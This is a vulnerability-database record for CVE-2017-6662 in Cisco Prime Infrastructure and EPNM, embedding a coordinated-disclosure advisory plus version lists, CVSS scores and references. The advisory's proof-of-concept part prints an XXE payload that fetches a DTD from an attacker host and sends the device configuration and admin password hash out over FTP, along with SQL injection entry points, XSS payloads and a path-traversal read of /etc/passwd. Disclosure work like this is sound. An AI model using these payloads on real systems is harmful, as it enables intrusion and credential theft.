ID

VAR-201706-0581


CVE

CVE-2017-6662


TITLE

Cisco PI and EPNM of Web Base user interface XML External entity vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2017-005143

DESCRIPTION

A vulnerability in the web-based user interface of Cisco Prime Infrastructure (PI) and Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker read and write access to information stored in the affected system as well as perform remote code execution. The attacker must have valid user credentials. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing an XML file. An attacker could exploit this vulnerability by convincing the administrator of an affected system to import a crafted XML file with malicious entries which could allow the attacker to read and write files and execute remote code within the application, aka XML Injection. Cisco Prime Infrastructure software releases 1.1 through 3.1.6 are vulnerable. Cisco EPNM software releases 1.2, 2.0, and 2.1 are vulnerable. Cisco Bug IDs: CSCvc23894 CSCvc49561. Vendors have confirmed this vulnerability Bug ID CSCvc23894 and CSCvc49561 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code, gain access to sensitive information or cause denial-of-service conditions. Cisco Evolved Programmable Network Manager 1.2, 2.0, and 2.1. PI is a set of wireless management solutions through Cisco Prime LAN Management Solution (LMS) and Cisco Prime Network Control System (NCS) technologies; EPNM is a set of network management solutions. SEC Consult Vulnerability Lab Security Advisory < 20170622-0 > ======================================================================= title: XML External Entity Injection (XXE), SQL Injection, Cross Site Scripting, Local File Disclosure product: Cisco Prime Infrastructure vulnerable version: 1.1 through 3.1.6 fixed version: 3.1.6 Update 1 (patch), 3.1.7 (future release) CVE number: CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700 impact: high homepage: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html found: 2016-11-21 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Cisco Systems, Inc. (known as Cisco) is an American multinational technology conglomerate headquartered in San JosA(c), California, that develops, manufactures, and sells networking hardware, telecommunications equipment, and other high-technology services and products. Through its numerous acquired subsidiaries, such as OpenDNS, Cisco Meraki, and Cisco Jasper, Cisco specializes into specific tech markets, such as Internet of Things (IoT), domain security, and energy management." Source: https://en.wikipedia.org/wiki/Cisco_Systems Business recommendation: ------------------------ SEC Consult recommends to install the latest patch to fix the identified vulnerabilities. Since SEC Consult only performed a short security crash test on this product it is highly recommended to perform a thorough security review as there are indications for further vulnerabilities. Vulnerability overview/description: ----------------------------------- SEC Consult was able to identify some serious vulnerabilities with the low privileged "monitor-only" user. The hashed password of the local admin user can be accessed without authorization. 2) SQL Injection (CVE-2017-6698) The identified SQL injection vulnerability enables an authenticated attacker with low privileges to execute arbitrary SQL commands. 3) Cross site scripting (CVE-2017-6699, CVE-2017-6700) Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. 4) Local File Disclosure (no CVE assigned) Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: ----------------- 1) XML External Entity Injection (CVE-2017-6662) Login with a low privileged user and navigate to Settings > Export > select Format 'PDF' click 'Export'. Make sure the 'Chart' option is selected, this chart uses XML to build SVG images. POST /webacs/prime/ui/dashboard/renderer HTTP/1.1 Host: <CiscoPrimeHost> [...] output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE x [<!ENTITY %25 foo SYSTEM \"http://<AttackerHost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D $ cat sectest.dtd <!ENTITY % data SYSTEM "file:///storedconfig/active/startup-config"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>"> $ python -m SimpleHTTPServer 1234 $ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb $ ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.8.0_66@ > 230 more data please! < TYPE I > 230 more data please! < CWD ! > 230 more data please! < hostname <CiscoPrimeHost> [...] < ! > 230 more data please! < username admin password hash <AdminHashedPassword> > 230 more data please! < CWD role admin > 230 more data please! < ! [...] 2) SQL Injection (CVE-2017-6698) A low privileged user such as "monitor-only" user can read the admin's password hashes via SQL injection. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<SQL-Injection>&path=%2Froot Some vulnerable entry points require administrator privileges to exploit. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/<SQL-Injection>&ipAddress=/<SQL-Injection>&time=/<SQL-Injection>&auditDescription=/<SQL-Injection>&userGroup=/<SQL-Injection>&activeDomain=/<SQL-Injection> https://<CiscoPrimeHost>/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getJobDetails/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobs/<SQL-Injection>/Lightweight%20AP%20Operational%20Status Some URLs with this pattern are affected by the SQL injection vulnerability in the JSON field. https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.proxy/ (HTTP POST) { "items": [ "<SQL-Injection>", "ProxyPort", "ProxyUserName", "ProxyPassword", "isProxyEnabled", "isProxyAuthenticated" ] } https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.swim/ (HTTP POST) { "items": [ "<SQL-Injection>", "CCOPassword" ] } 3) Cross site scripting a) Reflected cross site scripting (CVE-2017-6699) https://<CiscoPrimeHost>/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=<img+src=x+onerror=alert(/XSS1/)>&confUrl=</ScR</ScRipT>ipT><img+src=x+onerror=alert(/XSS2/)> https://<CiscoPrimeHost>/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=</sc</script>ript><img+src=x+onerror=alert(/XSS1/)>&jobResultPageId='><img+src=x+onerror=alert(/XSS2/)> b) DOM-based cross site scripting (CVE-2017-6700) https://<CiscoPrimeHost>/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=<ExistingTaskID>&jobName="><img src=x onerror=alert(/XSS/)>&pageSettings= https://<CiscoPrimeHost>/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=<ExistingJobId>&lastRunResultState=Success&jobId=<ExistingJobId>&jobName=Mobility Service Status&jobBreadcrumName="><img src=x onerror=alert(/XSS/)> 4) Local File Disclosure The attacker must be in the super users or admin group in order to exploit this vulnerability. https://<CiscoPrimeHost>/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd GET /webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: <CiscoPrimeHost> [...] HTTP/1.1 200 OK Cache-Control: private Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Disposition: attachement; filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip" Content-Type: application/zip [...] $ unzip _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip Archive: _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../../../../../../../etc/passwd inflating: etc/passwd $ cat etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt [...] Vulnerable / tested versions: ----------------------------- According to information provided by Cisco, the following versions are affected: 1.1 through 3.1.6 SEC Consult tested the following versions which were the most recent ones at the time of discovery: * 3.1.0.0.70 * 3.1.0.0.132 incl. 3.1.4 patch Vendor contact timeline: ------------------------ 2016-11-23: Contacting vendor through psirt@cisco.com. 2016-11-23: Initial response from Cisco PSIRT. 2016-11-24: Additional vulnerabilities added. 2016-12-14: Cisco proposed target date for the fixes for March 2017. 2017-03-03: Cisco postponed target date for the fixes to 31 May 2017. 2017-05-16: Cisco postponed target date for the fixes to 21 June 2017. 2017-06-14: CVEs are assigned to the vulnerabilities. 2017-06-21: Patches available 2017-06-22: Coordinated release of security advisory. Solution: --------- Install the patch version 3.1.6 Update 1. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Pichaya Morimoto / @2017

Trust: 2.07

sources: NVD: CVE-2017-6662 // JVNDB: JVNDB-2017-005143 // BID: 99194 // VULHUB: VHN-114865 // PACKETSTORM: 143111

AFFECTED PRODUCTS

vendor:ciscomodel:prime infrastructurescope:eqversion:1.4.1

Trust: 1.9

vendor:ciscomodel:prime infrastructurescope:eqversion:2.1.0

Trust: 1.6

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.200

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope:eqversion:3.2_base

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope:eqversion:2.2\(3\)

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope:eqversion:1.3.0.20

Trust: 1.6

vendor:ciscomodel:evolved programmable network managerscope:eqversion:2.0\(4.0.45d\)

Trust: 1.6

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.500

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope:eqversion:1.3

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.2

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.0

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:2.2

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:2.0

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.4.2

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.4

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.2.1

Trust: 1.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.2.0.103

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1\(5.0\)

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1\(4.0\)

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:1.4.0.45

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:3.2\(0.0\)

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1.1

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.300

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.1.3

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.0

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:2.2\(2\)

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope:eqversion:2.0.0

Trust: 1.0

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1\(0.128\)

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2.400

Trust: 1.0

vendor:ciscomodel:evolved programmable network managerscope: - version: -

Trust: 0.8

vendor:ciscomodel:prime infrastructurescope: - version: -

Trust: 0.8

vendor:ciscomodel:prime infrastructurescope:eqversion:3.0.0

Trust: 0.6

vendor:ciscomodel:prime infrastructurescope:eqversion:3.0_base

Trust: 0.6

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1.6

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1.5

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.0.3

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.0.2

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.2

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1(1)

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:2.0.0

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.4.0

Trust: 0.3

vendor:ciscomodel:prime infrastructurescope:eqversion:1.1

Trust: 0.3

vendor:ciscomodel:evolved programmable network managerscope:eqversion:2.1

Trust: 0.3

vendor:ciscomodel:evolved programmable network managerscope:eqversion:2.0

Trust: 0.3

vendor:ciscomodel:evolved programmable network managerscope:eqversion:1.2

Trust: 0.3

vendor:ciscomodel:prime infrastructure updatescope:neversion:3.1.61

Trust: 0.3

sources: BID: 99194 // JVNDB: JVNDB-2017-005143 // CNNVD: CNNVD-201706-953 // NVD: CVE-2017-6662

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-6662
value: HIGH

Trust: 1.0

NVD: CVE-2017-6662
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201706-953
value: HIGH

Trust: 0.6

VULHUB: VHN-114865
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2017-6662
severity: MEDIUM
baseScore: 6.0
vectorString: AV:N/AC:M/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.8
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-114865
severity: MEDIUM
baseScore: 6.0
vectorString: AV:N/AC:M/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.8
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-6662
baseSeverity: HIGH
baseScore: 8.0
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.1
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-114865 // JVNDB: JVNDB-2017-005143 // CNNVD: CNNVD-201706-953 // NVD: CVE-2017-6662

PROBLEMTYPE DATA

problemtype:CWE-611

Trust: 1.9

problemtype:CWE-20

Trust: 1.0

sources: VULHUB: VHN-114865 // JVNDB: JVNDB-2017-005143 // NVD: CVE-2017-6662

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 143111 // CNNVD: CNNVD-201706-953

TYPE

code problem

Trust: 0.6

sources: CNNVD: CNNVD-201706-953

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-005143

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-114865

PATCH

title:cisco-sa-20170621-piepnm1url:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170621-piepnm1

Trust: 0.8

title:Cisco Prime Infrastructure and Evolved Programmable Network Manager Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=71174

Trust: 0.6

sources: JVNDB: JVNDB-2017-005143 // CNNVD: CNNVD-201706-953

EXTERNAL IDS

db:NVDid:CVE-2017-6662

Trust: 2.9

db:BIDid:99194

Trust: 2.0

db:SECTRACKid:1038750

Trust: 1.7

db:JVNDBid:JVNDB-2017-005143

Trust: 0.8

db:CNNVDid:CNNVD-201706-953

Trust: 0.7

db:PACKETSTORMid:143111

Trust: 0.2

db:VULHUBid:VHN-114865

Trust: 0.1

sources: VULHUB: VHN-114865 // BID: 99194 // JVNDB: JVNDB-2017-005143 // PACKETSTORM: 143111 // CNNVD: CNNVD-201706-953 // NVD: CVE-2017-6662

REFERENCES

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm1

Trust: 2.1

url:http://www.securityfocus.com/bid/99194

Trust: 1.7

url:http://www.securitytracker.com/id/1038750

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2017-6662

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6662

Trust: 0.8

url:http://www.cisco.com/

Trust: 0.3

url:https://<ciscoprimehost>/webacs/loginaction.do?action=login&product=wcs&selectedcategory=en#pageid=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceload=true&jobtype=infrastructure&workstate=scheduled&parenttype=usrdefined&lastrunjobid=<existingjobid>&lastrunresultstate=success&jobid=<existingjobid>&jobname=mobility

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categorypath=<sql-injection>

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm4

Trust: 0.1

url:https://<ciscoprimehost>/webacs/index_abs.jsp?theme=prime#pageid=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskid=<existingtaskid>&jobname="><img

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6699

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/preferences/systempreferencesfornode/default.swim/

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/pi_recent_links?categorypath=global%2fpi_recent_links<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getalljobs/<sql-injection>/lightweight%20ap%20operational%20status

Trust: 0.1

url:https://bst.cloudapps.cisco.com/bugsearch/bug/cscvc49548

Trust: 0.1

url:https://www.sec-consult.com/en/career.htm

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/preferences/systempreferencesfornode/default.proxy/

Trust: 0.1

url:http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/pi_home_page_selection?categorypath=<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/applications/common/jsp/systempreferences_configurable.jsp?taskname=<img+src=x+onerror=alert(/xss1/)>&confurl=</scr</script>ipt><img+src=x+onerror=alert(/xss2/)>

Trust: 0.1

url:https://en.wikipedia.org/wiki/cisco_systems

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/userservice/getauditrecordsforgivenrange/?username=/<sql-injection>&ipaddress=/<sql-injection>&time=/<sql-injection>&auditdescription=/<sql-injection>&usergroup=/<sql-injection>&activedomain=/<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/dashboard_config:com_cisco_xmp_web_page_smartlicense_dashboard?categorypath=<sql-injection>

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm2

Trust: 0.1

url:https://twitter.com/sec_consult

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categorypath=<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/applications/inventory/html/importjobresults.jsp?taskid=</sc</script>ript><img+src=x+onerror=alert(/xss1/)>&jobresultpageid='><img+src=x+onerror=alert(/xss2/)>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/packetcaptureaction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd

Trust: 0.1

url:https://bst.cloudapps.cisco.com/bugsearch/bug/cscvc25573

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<sql-injection>&path=%2froot

Trust: 0.1

url:http://<attackerhost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"devices,\"","title"%3a"","timestamp"%3a""}],"nobrandingdata"%3atrue,"locale"%3a"en"}&pdfoptions=%7b%22table%22%3atrue%2c%22chart%22%3atrue%7d

Trust: 0.1

url:https://<ciscoprimehost>/webacs/inventoryrestservice/ifm/inventory-rest/getimporttaskstatusdto/<sql-injection>

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getjobdetails/<sql-injection>

Trust: 0.1

url:https://www.sec-consult.com/en/vulnerability-lab/advisories.htm

Trust: 0.1

url:https://www.sec-consult.com/en/about/contact.htm

Trust: 0.1

url:https://raw.githubusercontent.com/onsec-lab/scripts/master/xxe-ftp-server.rb

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getalljobsctr/infrastructure/<sql-injection>

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm3

Trust: 0.1

url:https://software.cisco.com/download/release.html?mdfid=286304360&catid=268439477&softwareid=284272933&release=3.1.6&relind=available&rellifecycle=&reltype=latest

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6700

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6698

Trust: 0.1

sources: VULHUB: VHN-114865 // BID: 99194 // JVNDB: JVNDB-2017-005143 // PACKETSTORM: 143111 // CNNVD: CNNVD-201706-953 // NVD: CVE-2017-6662

CREDITS

The vendor reported this issue.

Trust: 0.3

sources: BID: 99194

SOURCES

db:VULHUBid:VHN-114865
db:BIDid:99194
db:JVNDBid:JVNDB-2017-005143
db:PACKETSTORMid:143111
db:CNNVDid:CNNVD-201706-953
db:NVDid:CVE-2017-6662

LAST UPDATE DATE

2024-11-23T22:38:28.025000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-114865date:2019-07-29T00:00:00
db:BIDid:99194date:2017-06-21T00:00:00
db:JVNDBid:JVNDB-2017-005143date:2017-07-19T00:00:00
db:CNNVDid:CNNVD-201706-953date:2019-07-30T00:00:00
db:NVDid:CVE-2017-6662date:2024-11-21T03:30:14.960

SOURCES RELEASE DATE

db:VULHUBid:VHN-114865date:2017-06-26T00:00:00
db:BIDid:99194date:2017-06-21T00:00:00
db:JVNDBid:JVNDB-2017-005143date:2017-07-19T00:00:00
db:PACKETSTORMid:143111date:2017-06-22T23:23:23
db:CNNVDid:CNNVD-201706-953date:2017-06-22T00:00:00
db:NVDid:CVE-2017-6662date:2017-06-26T07:29:00.170